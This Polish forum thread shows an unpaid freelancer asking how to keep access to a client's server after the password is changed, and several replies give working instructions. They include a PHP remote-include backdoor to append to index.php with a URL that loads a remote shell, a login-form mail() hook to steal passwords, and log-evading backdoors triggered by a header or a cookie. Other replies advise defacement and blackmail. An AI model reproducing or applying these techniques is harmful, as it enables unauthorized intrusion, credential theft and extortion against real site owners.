Pokaż wyniki 1 do 6 z 6

Temat: Problem

  1. #1
    Zarejestrowany
    Sep 2008
    Postów
    2

    Domyślnie Problem

    Witam.

    Mam pewien problem.
    Ostatnimi czasy robilem dla goscia dosc sporo zeczy m.in grafike dla strony, banery itp.
    Niestety od 3 miesiecy czekam na kase jak nie bylo tak nie ma.
    Nie wiem jak moge odzyskac ta kase :/

    i wlasnie w tym zecz, chcialbym sie jakos zabezpieczyc.
    Mam dostep do jego serwera (choc nie wiem na jak dlugo, kiedy zmieni haslo)
    nie zalezy mi na usunieciu danych bo co mi to da skoro za pare dni przywroci wszystko hostingodawca. Chodzi mi o jakies zabezpieczenie dla mnie zebym mogl np. wejsc po zmianie hasla. Nie wiem czy cos takiego jest mozliwe.

    Moze Wy macie jakies pomysly co moglbym zrobic ?
    Dziekuje za pomoc

    Pozdrawiam

  2. #2
    Avatar javaman
    javaman jest offline www.javainside.pl
    Zarejestrowany
    Mar 2008
    Skąd
    no przed monitorem przecież...
    Postów
    474

    Lightbulb

    Czy ta strona jest oparta na bazie danych? Możesz niepostrzeżenie dodać podstronę, która pozwoli Ci na manipulację danymi w bazie. Jeśli strona ma system newsów to możesz dodać newsa typu "Dziś właściciel tej strony znowu okazał się być oszustem. Polecamy strony uczciwej konkurencji". Co z tego ze zmieni hasło. raczej długo będzie szukał zanim znajdzie przyczynę takiego stanu rzeczy. Po za tym. Strona jest formalnie Twoją własnością intelektualną. Nie zapłacił Ci za nią, a więc jako twórca prawnie jesteś jej właścicielem. I teraz to Ty możesz go podać do sądu/zgłosić na policję o kradzież własności intelektualnej, co o ile się nie mylę, odpowiada mniej więcej piraceniu windowsa.
    A na przyszłość realizuj zlecenia etapami, robisz jakąś część funkcjonalności, on część płaci, później następne etc. Inaczej możesz wielokrotnie znaleźć się jeszcze w czarnej d...ie. To dotyczy nie tylko zwykłych cwaniaczków, ale również wydawać by się mogło poważnych firm.
    Możesz podać adres tej strony?

    Niestety nie pocieszę CIę, kasy raczej nie odzyskasz za nic, naciski raczej nic nie pomogą a Tobie mogą zaszkodzić. Na przyszłość masz nauczkę po prostu. No i oczywiście możesz się odegrać dla własnej satysfakcji.
    Sam miałem ostatnio podobną sytuację. Zostałem zrobiony w konia przez tego oszusta:
    http://www.gancarski.info/
    Mieliśmy mu skonfigurować serwer, podobno mu się strasznie śpieszyło, nie czekaliśmy na zaksięgowanie przelewu i zrobiliśmy mu wierząc na słowo że przelał. Po tygodniu okazało się ze jednak nie przelał i po dłuższej rozmowie stwierdził ze zaraz przeleje. Pokazał mi screena przelewu. Przelewu który od prawie 2 tygodni nie dotarł. I pewnie nigdy nie dotrze. Anulował go najprawdopodobniej. Nigdy więc nie wierzcie w screeny przelewów. Dotyczyło to co prawda śmiesznej kwoty, coś koło 300zł, ale nie warte tych nerwów. Oczywiście obecnie mam świetną zabawę opisując to zabawne wydarzenie na pohybel oszusta, coby klientów więcej nie miał i aby google zaindeksowało m.in ten post, tak, by osoba szukająca go w necie dowiedziała się co nie co o nim. I co? Warto było?
    Ostatnio edytowane przez javaman : 09-08-2008 - 20:34

  3. #3
    Avatar VLN
    VLN
    VLN jest offline Banned
    Zarejestrowany
    Jan 2008
    Postów
    277

    Domyślnie

    Chodzi mi o jakies zabezpieczenie dla mnie zebym mogl np. wejsc po zmianie hasla. Nie wiem czy cos takiego jest mozliwe.
    Jest możliwe , ba ! Nawet często stosowane , to tzw. backdoor czyli tylne wejście (Wiki)

    Wspominałeś o hostingu więc zakładam że chodziło by o backdoora w stylu shell-a , mógłbyś wy edytować dowolny plik na serwerze (np. index.php)
    dopisując na końcu

    Kod php:
    <?php
    $backdoor 
    $_GET['zmienna'];
    include(
    $backdoor);
    ?>
    I po prostu uruchamiać
    http://www.strona.pl/index.php?zmien....com/shell.php

    Haczyk jest , nie każdy serwer pozwala na includowanie plików z innych serwerów.

    PS. Albo dostęp do bazy danych , hasła powinny być gdzieś w config.php

    Pozdrawiam VLN.
    Kod php:
    $zmienna $_POST['COS']; 
    Zamiast tego :
    Kod php:
    $zmienna htmlspecialchars($_POST['COS']); 
    I mamy zabezpieczenie przed XSS

  4. #4
    rip
    rip jest offline Banned
    Zarejestrowany
    May 2008
    Postów
    534

    Domyślnie

    po moich wlamach zazwyczaj zostawiam @mail() po formulazu logowania, kilka backdoorow typu (if(@$_SERVER['HTTP_XXX'] === 'hax')sciagnij_plik_php()).
    Wazne zeby nie operowac na get/post/ua bo wszystko leci do logow, i admin moze latwo przywrocic. najlepiej dodaj cos do indexu. I jeszcze wiele zalezy od hostingu, czasem przydaje sie wjechac na maila admina i zobaczyc/zmienic odpowiedz (do przypomnienia hasla). Jak bedziesz mial roota mozesz wrzucic jakiegos backdoora, ale ja tego nigdy nie probowalem. Ogolnie nie da sie tego wytlumaczyc w 1 topicu, trzeba nabrac doswiadczenia.

    Kilka porad:
    Zbierz jak najwiecej danych w sposob nieinwazyjny (tzn zeby admin sie nie polapal ze cos jest nie tak). Tyczy sie to stronki, bazy, ftp, panelu, maila.
    Zazwyczaj ludzie maja takie same hasla wszedzie, wiec mozesz nie miec problemu. Jesli jednak bedzie mial inne, to zmien hash w bazie i dodaj mail() przed logowaniem. Dziala w 99%, podaja wszystkie hasla Poszukaj na google innych stron, i w miare mozliwosci zdobadz hasla.
    Najwazniejszy jest mail, mozna naprawde sporo wyciagnac.

    Jak zdobedziesz juz wystarczajaco duzo danych, mozesz zaczac go szantazowac. Jakby co, to w pare minut przejmujesz jego dorobek, zmieniasz hasla, i gosciu lezy. Mozesz tez sie bawic zleceniami przelewow, jak on na tym zarabia

    Albo sprawdzic z jakiego ip sie loguje, i dac warunek gdzies w plikach if(remote_addr !=== 66.66.66.66)readfile('admin_to_oszust.txt')


    Good luck!

  5. #5
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    ciekawe backdory w php mozna robic

    np. preg_replace i modyfikator /e
    dac extract i wrzucac cookiesami wtedy nie ma w logach

    zrob skrypt php ktory wyswietli wielgasny baner, ze gosc jest oszustem, ale tylko dla IP innych niz jego.
    http://gogulas.yoyo.pl/h.gif

  6. #6
    Zarejestrowany
    Sep 2008
    Postów
    2

    Domyślnie

    no wiec problem polega na tym ze teraz mam dostep do jego serwera (na ktorym ma pare stron/portali)
    choc wydaje mi sie ze pewno za niedlugo zmieni haslo i tyle bede z tego mial.

    Chodzi mi dokladniej o dostep do serwera po zmianie hasla.

    Nic mi nie da usuwanie danych bo zadzwoni do hostingodawcy i poprosi o backup, dlatego tak wazne jest dla mnie dostep po zmianie hasla (teraz normalnie moge wejsc na serwer)

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj